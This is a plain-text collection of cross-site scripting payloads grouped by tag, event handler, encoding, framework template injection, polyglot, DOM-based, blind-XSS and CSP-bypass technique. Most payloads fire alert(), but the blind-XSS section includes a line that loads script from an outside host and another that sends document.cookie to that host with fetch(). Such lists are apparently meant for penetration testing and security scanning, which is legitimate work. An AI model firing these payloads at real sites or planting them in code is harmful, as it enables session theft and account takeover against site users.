# XSS Payloads Collection
# Organized by context and bypass techniques

# === Basic Payloads ===
<script>alert('XSS')</script>
<script>alert(1)</script>
<script>alert(document.domain)</script>
<script>alert(document.cookie)</script>

# === Image Tag ===
<img src=x onerror=alert('XSS')>
<img src=x onerror=alert(1)>
<img src=x onerror=alert(document.domain)>
<img src=x onerror=alert(document.cookie)>
<img src=javascript:alert('XSS')>

# === SVG ===
<svg onload=alert('XSS')>
<svg onload=alert(1)>
<svg onload=alert(document.domain)>
<svg onload=alert(document.cookie)>
<svg/onload=alert(1)>

# === Body/Other Tags ===
<body onload=alert('XSS')>
<body onpageshow=alert(1)>
<iframe src=javascript:alert('XSS')>
<iframe onload=alert(1)>
<input onfocus=alert('XSS') autofocus>
<textarea onfocus=alert(1) autofocus>
<select onfocus=alert('XSS') autofocus>
<keygen onfocus=alert(1) autofocus>

# === Video/Audio ===
<video><source onerror=alert('XSS')>
<video onerror=alert(1)>
<audio src=x onerror=alert('XSS')>
<audio onerror=alert(1)>

# === Marquee/Object/Embed ===
<marquee onstart=alert('XSS')>
<marquee onscroll=alert(1)>
<object data=javascript:alert('XSS')>
<embed src=javascript:alert(1)>

# === Form/Link ===
<form><button formaction=javascript:alert('XSS')>
<a href=javascript:alert(1)>click</a>

# === Encoded Variants ===
&lt;script&gt;alert('XSS')&lt;/script&gt;
&#60;script&#62;alert(1)&#60;/script&#62;
%3Cscript%3Ealert('XSS')%3C/script%3E

# === Case Variations ===
<ScRiPt>alert('XSS')</ScRiPt>
<SCRIPT>alert(1)</SCRIPT>
<sCrIpT>alert(document.domain)</sCrIpT>

# === Event Handlers ===
onerror=alert(1)
onload=alert('XSS')
onmouseover=alert(1)
onclick=alert('XSS')
onfocus=alert(1)
onblur=alert('XSS')
onchange=alert(1)
onsubmit=alert('XSS')
onkeypress=alert(1)
onmouseenter=alert('XSS')
onmouseleave=alert(1)

# === HTML5 Specific ===
<details open ontoggle=alert('XSS')>
<summary ontoggle=alert(1)>

# === Template Literals (for JS context) ===
${alert(1)}
${alert('XSS')}
${document.cookie}

# === Angular/Vue/React Specific ===
{{constructor.constructor('alert(1)')()}}
{{_c.constructor('alert("XSS")')()}}
{{$on.constructor('alert(1)')()}}

# === Bypass Techniques ===
<script>alert`1`</script>
<script>alert(1)</script>
<script>alert/**/(1)</script>
<script>alert%28%27XSS%27%29</script>
<script>alert&#40;1&#41;</script>

# === Polyglot Payloads ===
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

# === DOM-based XSS ===
#'><script>alert(1)</script>
#'><img src=x onerror=alert('XSS')>
#'><svg onload=alert(1)>

# === Blind XSS (for XSS Hunter, etc) ===
<script src=https://your.xss.ht></script>
<img src=x onerror=fetch('https://your.xss.ht/?c='+document.cookie)>

# === CSP Bypass ===
<script src=data:text/javascript,alert(1)></script>
<script src=//ajax.googleapis.com/ajax/libs/jquery/2.2.2/jquery.min.js></script>
